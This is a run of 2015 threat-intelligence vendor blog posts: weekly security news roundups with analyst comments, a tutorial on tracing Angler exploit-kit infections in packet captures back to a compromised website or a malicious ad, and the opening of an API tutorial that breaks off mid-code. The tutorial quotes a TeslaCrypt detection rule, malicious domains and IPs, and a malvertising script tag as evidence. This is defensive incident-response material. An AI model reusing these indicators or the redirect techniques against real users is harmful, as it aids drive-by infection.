We have observed no concrete evidence suggesting the “Islamic Cyber Army” (ICA), the pro-ISIS hacktivist group that stated its intention to conduct cyber threat activity against the UK, is officially supported, directed or endorsed by leaders or members of the ISIS terrorist organization as claimed in the media. On Sept. 21, 2015, the pro-ISIS hacktivist group ICA announced it would conduct cyber threat activity against the United Kingdom in a campaign dubbed “#BritainUnderHacks.” We believe that #BritainUnderHacks presents a low-level threat to well-maintained and patched UK Government and corporate websites. This campaign appears similar to the ICA’s Sept. 11, 2015 “#AmericaUnderHacks” campaign, which targeted U.S. Government entities and financial institutions but had only a limited impact.

RELATED iSIGHT PARTNERS REPORTS
15-00010034 (Alert: Islamic Cyber Army Threatens Cyber Attacks Against the UK in #BritainUnderHacks), 22 Sept. 2015
15-00009448 (ICA Gains Unauthorized Access to Bank Sites, e-Learning Portal; ISHD Posts New List of US Military Personnel PII on Anniversary of Sept. 11 Attacks Against the US), 16 Sept. 2015
15-00009384 (Pro-ISIS Hacktivists Threaten Cyber Threat Activity Against the U.S. Government, Financials on September 11), 9 Sept. 2015


ATTACKERS COULD HAVE WIPED MOBILE DEVICES IN AN SAP AFARIA NETWORK WITH ONE SMS

FROM THE MEDIA

Several security flaws were discovered in SAP Afaria, a BYOD software platform. According to researchers at ERPScan, the software had several flaws, which have since been patched, that could have allowed an attacker to take control of all mobile devices connected to it. Furthermore, attackers would have been able to delete all data with one crafted SMS message.
Read the Story: Softpedia

iSIGHT PARTNERS ANALYST COMMENT
All software platforms, especially large ones such as SAP Afaria’s, inherently contain numerous vulnerabilities, both known and undiscovered. We have rated all of these vulnerabilities as low-risk, mostly due to the limited impact of exploitation or required level of user interaction. ERPScan’s responsible disclosure and delayed public disclosure also greatly mitigates the threat of exploitation, as enterprises have had ample time to apply most of the patches before details were made public. Additionally, we have not historically observed actor interest in exploiting vulnerabilities affecting SAP Afaria platforms.

RELATED iSIGHT PARTNERS REPORTS
15-00002320 (SAP Afaria Buffer Overflow Vulnerability CVE-2015-2820), 2 April 2015
15-00002338 (SAP Afaria Authentication Bypass Vulnerability CVE-2015-2816), 2 April 2015
15-00008130 (SAP Afaria Cross-Site Scripting Vulnerability CVE-2015-6663), 25 Aug. 2015


 

The post ThreatScape Media Highlights Update – Week Of September 23rd appeared first on iSIGHT Partners.

Watering Holes and Malvertising: Uncovering the Root Cause of Compromise (Part 1)

$
0
0

So what is this all about??

As part of our normal course of operations as a cyber threat intelligence provider, we monitor the cyber crime underground and  the world of cyber espionage. We provide analysis to our clients on new and emerging threats as well as help them analyze artifacts found on their networks.  As you can imagine, we naturally run into large quantities of malware on a daily basis, conduct a great deal of reverse engineering and aide from time to time in incident response. Every once in awhile, we try to share details on what we find and how we find it to the public in the interest of informing the community around new threats and providing actionable analysis to support the hunt and kill missions.

We recently were asked to help one of our clients determine whether or not the root cause of an exploit kit exposure was related to a compromised website or an attack through malvertising. We decided to put together this blog to help you in this investigative process.

Hat-tip and thanks to Brad Duncan. Brad helped us with this analysis. He is a Security Researcher at Rackspace. He runs the blog www.malware-traffic-analysis.net, and he is also a handler at the Internet Storm Center (isc.sans.edu)

Should you have any questions about the details in this blog, please do not hesitate to drop us a line and we will work to get you the answers that you need.

We’re also recording a webinar (today – 9.24.15) to discuss the same. Watch our FREE Online Workshop – Watering Holes & Malvertising: Uncovering the Root Cause of Compromise – for an informative how-to session. If you’re reading this post the 9.24.15 session, no worries – the above link will get you to an on-demand version of the session.

The below blog represents part 1 – looking at strategic web compromise. As this is a lot to write and consume, we will post part 2 tomorrow related to the malvertising angle.

Background: Understanding “Drive-By” Exploitation

Drive-by exploitation is the process of intercepting a potential victim during their typical web browsing activities, utilizing malicious code and process manipulation to install malware on the victim machine, generally without user awareness or interaction. Drive-by exploitation is most commonly performed using exploit kits – malicious code (typically, thought not always expressed as web applications) that are designed to facilitate the automation of victim profiling, exploitation, and payload installation.

Incidents involving exposure to an exploit kit are typically classified as “drive-by” exploitation, but can be sub-divided into two general categories based on the root cause of the incident. These categories divide kit interactions caused by website compromise from those caused by malicious advertising (“malvertising”).

• Website Compromise: if an attacker has compromised a website or a third-party resource/content management system used consistently by that website and used this access to introduce foreign code designed to profile, redirect, or directly exploit potential victims directly into the page’s source code then this incident can be categorized as website compromise.

• Malvertising: if an attacker has created malicious advertising content (a “creative”) that is used by an advertising network, then the root cause is said to be malicious advertising. While malvertising does affect a third-party resource used by a website (making it a sub-category of website compromise), it is specifically differentiated from website compromise by its inherent randomness; since advertising servers generate unique, varied creative content, each exposure to a site hosting an advertisement has a probabilistic chance of displaying a malicious creative. It is also differentiated by the defensive mechanisms that can be taken, which differ from website compromise generally, and by which party that can best mitigate the attack.

Why Analyze Root Cause?

Determining the point of origin for an incident involving an exploit kit can help an organization or end-user design better defenses that may prevent similar activity from being successful on potential future exposure. Determining how a kit exposure happened enables proactive defensive action specific to the identified activity.

Root-cause analysis can also help with the process of notifying entities capable of taking action to mitigate the threat. This can include notifying the owner/operator of compromised websites and/or identifying which components of the website may have caused the original exposure. It also may enable the identification of creative IDs, which generally link one-to-one with specific advertising content. These IDs may be used by advertising services that are willing to take action to prevent malicious abuse of their service to identify malicious advertisements and users generating related content.

Pre-requisites for Analysis and Tool Variation

For this blog, we at iSIGHT Partners are working with Brad (known for operating Malware-traffic-analysis.net – a great site with resources for training). We’ve taken a variety of approaches and used a variety of tools to give perspective on different methods and means that can be used to tackle exploit kit traffic analysis. Feel free to check out some of the tools and processes we suggest here as well as to explore further (Fiddler is a good example of a tool we aren’t using in this tutorial, but that is useful for this line of work). If you’ve got other tools that you use that aren’t referenced here, leave a comment and start some discussion. We’re always looking for new ways to tackle problems.

Investigating exploit kit activity for root cause analysis generally requires a full packet capture of network traffic that includes the initial exposure. While some information can be determined without full packet capture, as a general rule you’re going to need this level of detail in order to definitively determine the root cause.

Approach

For this blog, we are going to be working through two case examples that demonstrate how to investigate exploit kits caused by website compromise (Case One) and another incident caused by malicious advertising (Case Two). For Case One, we will make use of CapTipper and Wireshark. Case Two makes use of ET/ET Pro, Suricata, Security Onion, and WireShark. Both cases explore Angler Exploit Kit variants.

Case One: Compromised Website

In this first example, we are examining an instance of an Angler Exploit Kit variant. This incident was recorded by Brad of malware-traffic-analysis.net, and the packet capture is available directly on his blog. To make analysis easier, we are going to make use of the tool CapTipper (GitHub: https://github.com/omriher/CapTipper; Documentation: https://captipper.readthedocs.org/en/latest/).

CapTipper is described as a Python tool to analyze, explore, and revive HTTP malicious traffic. The tool sets up a web server that acts as the server in a given PCAP file. The utility provides a number of different resources to help with investigations, and is very useful for simplifying and examining exploit kit traffic. We’ve gone ahead and prepared an HTML version of a CapTipper report for this blog that you can use to follow along. We’ll also supply some references to the packet capture itself in case you want to examine the traffic in WireShark (or another tool).

Approach: Understanding Exploit Kit TTPs and Getting an Overview of an Interaction

The Flow View section of the capture provides some initial hints that can help us make an educated guess about which requests may be of concern. Notice in the image below that there is one redirection from www.educatory.com to another website, followed by requests without referrers to ipinfo.io (which does provide, as you might guess, geolocation data), followed by further requests for micropiso.cl (which a brief Google search suggests ‘may be hacked’), and then requests for two very suspicious looking domains.

We also see a request for startssl.com and windowsupdate.com – both of which are potential harbingers that we’ve got an exploit kit and subsequent malware installation on our hands. That said, this example is a bit contrived in that the sample we’re examining only contains the activity associated with this one host interaction with an exploit kit. In a real-world example, there is going to be a lot of additional traffic from the network going on and, depending upon network instrumentation, the task may not be this simple.

Image 1

Examining this traffic flow against typical exploit kit behavior can provide us with some additional leads to investigate, particularly for cases where there is more activity going on. The diagram below is an example of typical TTPs we at iSIGHT Partners see in exploit kit interactions. Given this chain of events and the overall structure of the PCAP we’re examining, we can now begin to look for known malicious activity.

Image 2

Start with Known-Malicious Activity

When investigating the root cause of an incident involving an exploit kit, it is important to start from the known-malicious activity and work backwards to the point of origin, which may otherwise be difficult to identify (since it will not necessarily cause signatures to fire, does not typically involve any unusual file types). Instead, it is typically easier to start with the noisier evidence of a compromise (a payload, exploit, or landing page) and then work backwards to determine root cause. This doesn’t mean you have to start with analyzing the payload – but rather identifying the traffic associated with the payload or exploit may be easier.

The second part of this tutorial, by Brad, features an example of how to locate these structures in network traffic if you’d like to explore this starting point further.

CapTipper provides a menu for conversations that breaks down each set of requests according to its destination host. If you look towards the end of the provided HTML report you’ll see the conversations that are most likely to contain command and control communication from any installed payload, prefaced by the payload delivery, prefaced by exploit delivery, the landing page, and so on.

The last two conversations in the report are typical of some malware (that is, the use of windowsupdate.com and the use of startssl.com) – but neither can be considered unique to malware or particularly useful to our investigation. However, the conversation just previous to these requests may be more relevant (in WireShark, you can see similar requests by choosing the ‘File’ menu and selecting ‘Export Objects’ and then ‘HTTP’). A quick open-source search of the suspicious-looking pages “awoeinf832as.wo49i277rnw.com” and “qw2234duoiyu.h2fyr6785jhdhfg.com” is another indicator that we are on the right track (both are alleged by open-source reports to be associated with TeslaCrypt, which has been a relatively typical Angler Exploit Kit payload).

If we backtrack one step further in the ordered conversations, we can see the conversation between the client and www.micropiso.cl (recall that this site was listed by Google as potentially compromised). Here we can see some very suspicious looking traffic.

 

Image 3

Clicking on the requests within the conversation tells us a bit more about this interaction. The phrase “—!!!INSERTED!!!—” certainly suggests TeslaCrypt and helps corroborate the open-source searching we noted earlier. While it’s not enough information to give us definitive payload attribution, this phrase is an element of the Emerging Threats (ET) IDS rule sid:156662 used to detect TeslaCrypt – and it may explain why this file is being labeled as such in the open-source.

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:”ET TROJAN W32/TeslaCrypt.Ransomware CnC Server Response”; flow:established,to_client; file_data; content:”—!!!INSERTED!!!—“; within:20; classtype:trojan-activity; reference:url,blogs.cisco.com/security/talos/teslacrypt; sid:156662; rev:1;)

The ET rule referenced above also further classifies this activity as a “ransomware cnc server response” – which certainly matches with the right step in the compromise chain for what we’re seeing in this sample capture!

Image 4

Continuing to walk backwards through the report gives us a geolocation check, and then what appears to be the exploit kit’s exploit code. Examine the ninth request in CapTipper (in Wireshark’s HTTP object export display, you’ll see this conversation displayed, packets 254, 259, 289, 335, and 704). Let’s zoom in on this series of requests.

Image 5

This is the ninth conversation. CapTipper informs us that the content is a binary file (which appears to be encrypted – perhaps XTEA given the common use of XTEA for Angler shellcode). For the purpose of this tutorial we can probably guess that this is shellcode used by the exploit kit, but we will not be analyzing it directly (since we’re concerned with determining the origination point and not kit operational TTPs).

The eighth request contains a compressed Flash File, and there is a good chance this contains one or more exploits within it. This is another area we could explore further, but it will again not assist us in determining root cause.

Image 6

The seventh request is a bit more subtle.

Image 7

What could this request be? Its referrer matches the prior requests (go check!) – so it looks like the landing page has initiated this request as well. The content looks like it could be base64 – and a quick check suggests that that is most likely the case. The string provided in the Response Peek above, when decoded from base64 format, corresponds to:

{“B”:”2da0ee234b86550716162710ae69f415″,”k”:”irYZF9SDlHkPOs4I9kpYxQ%3D%3D”,”b”:”FaFaQ3kc34%2BgV4

This data is something relatively specific to the Angler Exploit Kit. It’s part of Angler’s implementation of Diffie-Helman cryptographic protocol. Kaspersky provided a great write-up on the kit’s use of this key exchange and the role it plays in the kit’s exploitation of CVE-2015-2419 that is definitely worth your time and review if you have interest in the kit’s defensive structure and attributes – but it goes a bit beyond the scope of our task for this blog.

The sixth conversation really gives us a solid picture of what we’re looking at.

Image 8

The quote, “marriage, the unceasing and …”, in CapTipper’s Response Peek gives a solid hint that we’re looking at Angler Exploit Kit or a variant. If you search for that quote in the open source (particularly “the unceasing and reasonable wonder among them all”) you will find the quote is lifted from Jane Austen’s Sense and Sensibility – an indicator historically associated with Angler and variant kits, which uses the book to bypass content filtration measures. You can view the entire page by downloading the file in CapTipper or in Wireshark by doing the following:

• Clear fall filters, if required
• Select the object from the HTTP export objects menu (described above)
• In the main view in WireShark, right click the highlighted packet
• Select ‘Follow TCP Stream’ from that menu
• View the TCP stream and save it to a file if needed (particularly in the encoding is making review difficult)

From here we can finally meet our ultimate objective – determining the point of origin for the exploit kit exposure.

Determining Root Cause

Angler isn’t always easy to tie back to a point of origin. The kit can use some interesting defensive mechanisms to help hide referrers. In addition, customers of the kit who make use of Traffic Distribution Services (TDSs) can further complicate the chain. In this case, though, we’re lucky enough to have a pretty good view of the chain. If you look at the previous request above, we can see that the referrer for the landing page is www.educatory.com (as we guessed from the original flow diagram). A quick peek at the source code for that site at the time (available via the download option in CapTipper or by going through the same investigative process in WireShark as before, but aimed at packet 34) shows us the context the kit was called from on the landing page. Take a look!

Image 9

(Image of Compromised Landing Page iframe, http://malware-traffic-analysis.net/2015/08/24/index2.html)

Seeing an iframe embedded in source code of the originating website without the other trappings expected of an advertisement is usually a good indication that the redirect is the result of a compromise.

Let Us Know if We Can Help…

We hope that you find the information above useful in your efforts to better secure your organization. If there are lingering questions, please do not hesitate to drop us a line and we will work to answer them for you. STAY TUNED for part 2 of this blog releasing tomorrow (9.25.15)

Keep fighting the good fight – we’re with you in the trenches – we’re up 24/7/365 all over the world…because someone should do something!

The post Watering Holes and Malvertising: Uncovering the Root Cause of Compromise (Part 1) appeared first on iSIGHT Partners.

Watering Holes and Malvertising: Uncovering the Root Cause of Compromise (Part 2)

$
0
0

Picking up where we left off…

Last week we issued Part 1 of this blog in the lead up to a live workshop session we held on 9.24.15. You can read Part 1 of the blog here and you can catch the on-demand recording of the workshop session here.

As promised, we’re release Part 2 of the blog today. With a little preamble dropped from the first blog below to give you context.

This part of the blog is delivered with thanks to Brad Duncan. Brad penned this portion of the blog and we’re thankful to him for his help here and for his collaboration. For those of you that don’t know Brad, he is a Security Researcher at Rackspace. He also runs the blog www.malware-traffic-analysis.net, and he is also a handler at the Internet Storm Center (isc.sans.edu).

So what is this all about??

As part of our normal course of operations as a cyber threat intelligence provider, we monitor the cyber crime underground and  the world of cyber espionage. We provide analysis to our clients on new and emerging threats as well as help them analyze artifacts found on their networks.  As you can imagine, we naturally run into large quantities of malware on a daily basis, conduct a great deal of reverse engineering and aide from time to time in incident response. Every once in awhile, we try to share details on what we find and how we find it to the public in the interest of informing the community around new threats and providing actionable analysis to support the hunt and kill missions.

We recently were asked to help one of our clients determine whether or not the root cause of an exploit kit exposure was related to a compromised website or an attack through malvertising. We decided to put together this blog to help you in this investigative process.

Should you have any questions about the details in this blog, please do not hesitate to drop us a line and we will work to get you the answers that you need.

The below blog represents part 2 – looking at the malvertising angle. Part 1 took a look at  strategic web compromise.

Part 2 – Malvertising

Analyzing an exploit kit involved in a malicious advertising works exactly the same way as with one involved in a website compromise. The only significant differences are the following:

• Exploit kit exposures caused by malicious advertisements may be more likely to use a traffic distribution system (TDS) or other mechanisms that may result in a longer redirect chain
• Mechanisms to hide the source of the malicious advertisement creative may make identifying the code causing the initial redirection more difficult.

Both of these factors can make analyzing a kit that uses malicious advertising more difficult. As a good example of common Malvertising techniques, we’ll use a pcap from Barracuda Labs’ Threatglass.com dated 2015-08-23. Our primary analysis toolbox for this walkthrough will be the Security Onion Linux distribution.

How can you find the EK traffic within this packet capture (pcap)? Download the pcap to a virtual machine (VM) running the Security Onion distribution and use the tcpreplay utility to replay it. My Security Onion VM is configured to use Suricata with the EmergingThreats (ET) signature set. We use tcpreplay on the pcap as shown in the screenshot below:

image 1

Image 2

Using Sguil, a graphical front-end for the monitoring tools within Security Onion, we find alerts for Angler EK on 92.63.102.211 as shown below:

Image 3

Let’s look at the traffic in Wireshark. First, if you do not already have an individual preference for Wireshark column configuration, you may find it helpful to set up the column display as described in my tutorial at: http://malware-traffic-analysis.net/tutorials/wireshark/index.html.

In this example, the Angler EK domain is can.berryelectricalusa.org on 92.63.102.211.

For malvertizing, we’ll need to work our way back from the landing page. We know that Angler EK is on 92.63.102.211, so use Wireshark to filter on that traffic. The below filter will display only HTTP requests (http.request) with a source or destination IP address of 92.63.102.211 (ip.addr eq 92.63.102.211); these filters can be combined as follows:

http.request and ip.addr eq 92.63.102.211

The first HTTP request should be the landing page. If the Angler EK landing page shows a referrer, you’ll find it by following that TCP stream. This should be TCP stream 113 (viewable directly with the filter ‘tcp.stream eq 113’, as below) from that pcap, and within that stream, you’ll see a referrer listed as: http://dvdjcdjcd.eu/ming/index.php.

Image 4

Next, I want to double-check to make sure there’s no step between the Angler EK landing page and the referrer. To do this, I used the following filter in Wireshark:

ip contains can.berryelectricalusa.org

This searches any IP traffic for the string can.berryelectricalusa.org. This should display any frames with that domain name (from DNS, HTTP, etc) from the pcap.

Image 5

The results show three HTTP GET requests to the EK domain and one 200 OK before that. Select that frame and follow the TCP stream. This confirms the HTTP GET request to dvdjcdjcd.eu returned an iframe to the Angler EK landing page, with no other domains between the two. So what caused the HTTP GET request to dvdjcdjcd.eu? Looking at the TCP stream, the referrer line shows: http://rbigames.net/.

Image 6

Again, we want to confirm there are no other URILs in the chain between the referrer (http://rbigames.net/) and this http GET request to dvdjcdjcd.eu. To do that, I used the following filter in Wireshark:

ip contains dvdjcdjcd.eu

Imge 7

As you see, there are three frames show up in the results. The first frame shows [TCP segment of a reassembled PDU], so we follow that TCP stream. The TCP stream shows the HTTP GET request to rbigames.net, and we see the malicious iframe to dvdjcdjcd.eu in the HTML returned after the 200 OK.

The referrer shows http://www.youradexchange.com/a/display.php? followed by a long string of characters as part of the URL. This type of long URL We’ve found our ad traffic.

Image 8

Our next step would be to use the Wireshark filter “ip contains rbigames.net”, but the results don’t show anything prior to the DNS query for rbigames.net. After trying a few searches, I used the following filter:

ip contains www.youradexchange.com

The first frame shows a 302 Moved Temporarily. Follow the TCP stream for that frame, and you’ll find an HTTP GET request to ui1.njaja.com with a referrer URL starting with: http://adservingsolutionsinc.adk2x.com/

The filter “ip contains adservingsolutionsinc.adk2x.com” displays a TCP stream that shows yllix.com as a referrer. It gets trickier from there to find the origin, but there appear to be several steps before that. The full chain of HTTP GET requests isn’t necessary, because we’ve already determined this is ad traffic, hence malvertizing.

If you do want to walk down the original advertisement, in Wireshark, set “ip contains yllix.com” as your filter and select the first frame, then following its TCP stream. We see referrer as “indofeed.com”.

Next we investigate using the filter “ip contains indofeed.com”. The first two frames are redirections, and the 3rd frame is an HTML page. Following the TCP stream shows that the data is GZIP encoded. By going to File > Export Objects > HTTP, exporting Packet 32, and then viewing this HTML file in a text editor, we can see the advertisement (it’s on line 89). Use the following process in Wireshark to export this file”

File -> Export Objects -> HTTP; and export Packet number 32.

When decoded, this file contains the following script:

‘<script type=”text/javascript” src=”http://yllix.com/banner.php?pub=788465&section=General&format=728×90&ga=g”></script>’.

Finally, we are at the source of the compromise. The numeric ID following the string “pub” (788465) is probably the creative ID for the relevant advertisement.

From an investigative perspective, Malvertizing is often more convoluted than instances of web compromise. Most often, it is difficult to determine the full chain of HTTP GET requests that led to the EK landing page. However, you can easily figure out if this is ad traffic by tracing back the HTTP GET requests.

In some cases, this is quite difficult. Angler EK caused by malvertizing sometimes will not have any referrers listed in headers for the HTTP GET request to the landing page. I’ve often been frustrated when investigating EK traffic caused by malvertizing.

So there you have it…

We hope that you find the information above useful in your efforts to better secure your organization. If there are lingering questions, please do not hesitate to drop us a line and we will work to answer them for you. Check out the great work that Brad does over at www.malware-traffic-analysis.net – he has some awesome tutorials and other great guides for making your very difficult jobs that much easier.

Keep fighting the good fight – we’re with you in the trenches – we’re up 24/7/365 all over the world…because someone should do something!

The post Watering Holes and Malvertising: Uncovering the Root Cause of Compromise (Part 2) appeared first on iSIGHT Partners.

ThreatScape Media Highlights Update – Week Of September 30th

$
0
0

The following is this week’s sample of ThreatScape® Media Highlights – an email roundup of security headlines augmented by insights and analysis from iSIGHT Partners. Our cyber threat intelligence clients receive this update daily.


 Wednesday, 30 September 2015 

Download PDF Version Here

NEWLY FOUND TRUECRYPT FLAW ALLOWS FULL SYSTEM COMPROMISE

Media On-Target

FROM THE MEDIA

James Forshaw, a Google Project Zero team member, discovered two vulnerabilities (CVE-2015-7358 and CVE-2015-7359) on the driver that TrueCrypt, a disk and partition encryption tool, installs on Windows systems. The flaws can allow attackers to obtain elevated privileges on a target’s system. VeraCrypt, an open-source program continuing to improve the original TrueCrypt project, issued VeraCrypt 1.15, which contains patches for these two vulnerabilities.
Read the Story: PC World

iSIGHT PARTNERS ANALYST COMMENT
We consider the privilege escalation vulnerabilities discovered by James Forshaw to be medium-risk, as an attacker would need to already have access to a vulnerable system or exploit another flaw in conjunction with them. Although exploitation of the vulnerabilities does not pose a significant threat, we judge the continued use of software past its support life to be a legitimate concern for enterprise environments. There are several alternative options available for users looking to encrypt their hard drives, including integrated support in post-XP versions of Windows.

RELATED iSIGHT PARTNERS REPORTS
Intel-1129003 (TrueCrypt to Be Discontinued; Users Should Seek Alternatives), 30 May 2014
15-00010280 (Weekly Vulnerability Exploitation Report), 28 Sept. 2015


XOR: LINUX-BASED BOTNET PUSHING 20 ATTACKS A DAY

Media On-Target

FROM THE MEDIA

Akamai recently released a report detailing several recent attacks from the XOR botnet. Akamai found that the vast majority of the botnet’s targets are organizations in Asia. The majority of attacks conducted by the botnet are DNS and SYN floods. The botnet attacks up to 20 targets per day, and one recent attack went as high as 179 Gbps. XOR is malware that infects Linux systems and turns them into bots.
Read the Story: CSO Online

iSIGHT PARTNERS ANALYST COMMENT
The XOR.DDoS malware appears to be of Chinese origin. Besides DNS and SYN, XOR has ACK flooding capabilities. The bot is also able to pull down additional configuration files to update its DDoS targets. Despite a history of less frequent abuse, Linux is often targeted by malicious actors and should still be subject to an update and patch management routine similar to that often applied to Windows systems.

RELATED iSIGHT PARTNERS REPORTS
15-00010216 (XOR.DDoS Linux DDoS Bot: Malware Behavior, Capabilities and Communications), 28 Sept. 2015
14-00000136 (Year-Long Elknot Linux Malware Campaign Most Likely Successful in Conducting Effective DDoS Attacks), 29 Dec. 2014
Intel-1076834 (Development of Threats to Individuals Using Linux and Unix-Like Operating Systems Through 2013), 31 March 2014


ARABIC THREAT GROUP TARGETS IT, INCIDENT RESPONSE TEAMS

FROM THE MEDIA

The Gaza Cybergang, aka Gaza Hackers Team, has recently been targeting information technology (IT) and incident response (IR) teams in the Middle East and North Africa (MENA) region. More specifically, the group appears to be mostly targeting government entities, particularly embassies of countries such as Yemen, the United Arab Emirates and Egypt. Attackers are focusing their efforts on IT and IR teams as their personnel usually have higher access and access to sensitive data.
Read the Story: Security Week

iSIGHT PARTNERS ANALYST COMMENT
This activity refers to operations conducted by Molerats Team, an espionage group that leverages publicly available tools against targets with Middle Eastern interests, and is consistent with the group’s targeting patterns. Recently we discovered a Molerats Team command and control server that indicated a collection effort was underway focused on the United Nations, Israeli academic institutions, media, researchers and influential social media personalities. It is likely Molerats Team is performing collection operations to facilitate a strategic campaign or future operations.

RELATED iSIGHT PARTNERS REPORTS
15-00008394 (Israel Country Profile), 4 Sept. 2015
15-00005666 (Molerats Targets UN, Journalists, Israel Supporters), 16 July 2015
15-00001878 (Molerats Team Targets), 27 March 2015


BANKING TROJAN SHIFU TURNS UP IN UK

FROM THE MEDIA

Shifu, a banking Trojan, has moved from Japan to the UK. The Trojan allegedly has 18 UK targets and is increasing activity to obtain higher infections. According to an IBM security researcher, the UK samples indicate that the Trojan’s authors are changing Shifu to ensure it continues to evade security detections. IBM has also noted that Shifu is likely to continue spreading, specifically to other parts of Europe and the United States.
Read the Story: Info Security Magazine

iSIGHT PARTNERS ANALYST COMMENT
Shifu is a new banking Trojan that shares some similarities with existing malware, such as Zeus and Shiz. We have no reason to doubt Shifu is targeting the UK. However, it is important to note that the additional targeting does not mean Shifu’s operators ceased operations against Japanese financial institutions. Other regions could also potentially be targeted by using easily customized configuration files.

RELATED iSIGHT PARTNERS REPORTS
ThreatScape Media Highlights (Japanese Banks Hit By New Trojan, ‘Shifu’), 2 Sept. 2015
14-29622 (Shiz Malware Modified to Include SAP Credential Theft), 14 Feb. 2014
15-00000226 (Angler Exploit Kit Overview), 23 April 2015


 

The post ThreatScape Media Highlights Update – Week Of September 30th appeared first on iSIGHT Partners.

ThreatScape Media Highlights Update – Week Of October 7th

$
0
0

The following is this week’s sample of ThreatScape® Media Highlights – an email roundup of security headlines augmented by insights and analysis from iSIGHT Partners. Our cyber threat intelligence clients receive this update daily.


 Wednesday, 7 October 2015 

Download PDF Version Here

TARGETED ATTACK EXPOSES OWA WEAKNESS

FROM THE MEDIA

Cybereason researchers have discovered an attack method whereby actors were able to access a corporate network and steal usernames and passwords via Outlook Web Access (OWA). An attack against an organization with 19,000 end points was executed for months, resulting in the theft of 11,000 user accounts. The actors were able to load a malicious dynamic library onto the victim’s OWA server and open a back door to collect credentials for the majority of the organization’s accounts.
Read the Story: Threat Post

iSIGHT PARTNERS ANALYST COMMENT
Indicators of compromise that would inform attribution efforts related to this event have not been released. However, OWA servers are certainly a valuable target for espionage actors as these servers authenticate based on domain credentials and, if compromised, can provide adversaries with domain administrator-level access. Espionage actors have also leveraged OWA in previous efforts to carry out mass compromise. It is noteworthy that in 2013 iSIGHT Partners reported activity conducted by Hippo Team actors leveraging the OWA login page for Norseman Defense Technologies to profile page visitors and likely direct desired victims to malicious exploits.

RELATED iSIGHT PARTNERS REPORTS
Intel-965305 (Hippo Team Profiling Activity Using OWA), 9 Oct. 2013
Intel-1004906 (Hippo Team Profiling Activity Affects Additional Websites), 8 Dec. 2013


CISCO DISRUPTS MAJOR RANSOMWARE OPERATION POWERED BY ANGLER EK

Off Target

FROM THE MEDIA
Cisco, with the help of L3 and OpenDNS, caused major operational damage to a group using the Angler exploit kit. Cisco found that many of the proxy servers the group used were hosted at a Dallas-based services provider. Cisco was then able to shut down the servers and obtain new insight into the group’s operations. The investigation found that the actors used stolen credit card information to purchase 815 servers in one week and served exploits to about 9,000 unique IP address per day.
Read the Story: Security Week

iSIGHT PARTNERS ANALYST COMMENT
Angler is currently one of the most popular and technically sophisticated exploit kits. While Cisco obtained an unprecedented look into Angler’s operations, we do not expect their actions to have significant long-term impact on Angler or its associated malware operations. At worst, we believe Cisco’s actions will force Angler’s operators to temporarily suspend activity to reconfigure their operations in a way Cisco’s new measures cannot affect. Even if Cisco could hinder Angler’s long-term operations or shut them down completely, malware operators utilizing Angler could easily adopt other exploit kits with little to no disruption, as many alternatives currently exist in the market (some of which may actually be more effective than Angler)

RELATED iSIGHT PARTNERS REPORTS
15-00000226 (Angler Exploit Kit Overview), 23 April 2015
15-00003550 (TeslaCrypt Malware Overview), 13 Aug. 2015
Intel-1162876 (Cryptowall Malware Overview), 5 Nov. 2015


AVERAGE COST OF CYBER CRIME PER ORGANIZATION ESCALATES TO $15 MILLION USD

FROM THE MEDIA
A recent study conducted by the Ponemon Institute found that in the US the average annual cost of cyber crime was $15 million USD. The figure represents an almost 20 percent increase over one year. The study also found that a variety of security technologies, policies and other investments, including using security intelligence, provide a significant return on investments.
Read the Story: Security Magazine

iSIGHT PARTNERS ANALYST COMMENT
Organizations continue to incur significant expenses as the result of cyber crime campaigns. We expect taking pro-active defense measures will help limit both the probability of these attacks being successful and the impact of breaches should they occur, which will help limit the cost of incidents. Furthermore, we expect organizations will increasingly turn to cyber security insurance policies to help mitigate costs in the event of malicious activity.

RELATED iSIGHT PARTNERS REPORTS
Intel-1281518 (Insurers in the US Seek to Bar Cyber Coverage Under Commercial General Liability; Appear to be Largely Successful), 6 Nov. 2014
15-00008770 (Data Loss Prevention (DLP) Software Effectiveness and Best Practices), 30 Sept. 2015
15-00001636 (Wide-Ranging Predictions for 2015 Generally Expect Increase in Quantity and Variety of Adversary Activity), 20 March 2015


RESEARCHERS STEAL SECRET RSA ENCRYPTION KEYS IN AMAZON’S CLOUD

FROM THE MEDIA

A group of professors at the Worcester Polytechnic Institute found a way to hack secret cryptographic keys used in Amazon Web Service’s virtual machine. The flaw, not specific to Amazon Web Service, lay in the Libgcrypt encryption library. The professors used a side-channel attack that allowed them to obtain information from users sharing virtual machines on the same server. According to the proof of concept hack, the attack is complicated and requires several steps, such as starting a virtual machine to first check if other users are on the same host and then seeing if they are running Libgcrypt for their RSA encryption.
Read the Story: CSO Online

iSIGHT PARTNERS ANALYST COMMENT
As this issue has been patched, we expect malicious adversaries will not be able to use it in the future. Given the complexity, we do not expect anyone, possibly other than state-supported actors, discovered and leveraged this particular flaw in the past. However, the flaw demonstrates the threat side-channel attacks may pose to cloud computing services in the event they are discovered and used by malicious actors.

RELATED iSIGHT PARTNERS REPORTS
15-00007290 (Threats to Cloud Providers), 31 July 2015
Intel-1229849 (Access Control, Input Validation and Cryptographic Vulnerabilities Commonly Affecting Cloud-Based Service Providers), 5 Sept. 2014


 

The post ThreatScape Media Highlights Update – Week Of October 7th appeared first on iSIGHT Partners.


Have You Pivoted Yet? Rapidly Move Between Data and Intelligence for Correlation and Alert Prioritization

$
0
0

This is Cool Stuff…

When we launched the second revision of our ThreatScape API early this year, we were extremely excited about the pivot functionality we added as we heard from a number of customers doing security operations and incident response that they needed functionality to rapidly move between data and intelligence for correlation and alert prioritization.

Admittedly, the blog below is geared more towards our existing clients…BUT – if you’re just checking us out, this is also a good taste of some of the cool stuff that you can do when fusing our cyber threat intelligence with your workflows.

More customers are now adopting it, so we thought a quick refresher/tutorial would be helpful. First, there are two overarching types of pivots available to API users:
Indicator Pivot – go from a technical indicator to related indicators
Report Pivot – go from one intelligence product to one or more related products OR go from one intelligence product to the technical indicators related to that intelligence

In the context of a case study, let’s assume our SEIM alerts with a SHA256 hash captured from an endpoint tool that correlates to ransomware potentially on our network. At this point, we want to capture what iSIGHT knows about this threat as well as expand to other file indicators to hunt for using our endpoint tools across our network. We can make the following pivot query to grab the related indicators:

   /pivot/indicator/sha256/d6cb5e7f6daebd2bf0e456dfc424f741b48c019a92648617ddbc4972cfe0925f

The pivot API endpoints support responses in JSON and XML. I prefer JSON for ease of use, especially in Python, so we can parse the response this way to capture other SHA256 hashes:

#assuming data holds the response from the API
parsedJson = json.loads(data)
sha256s = []
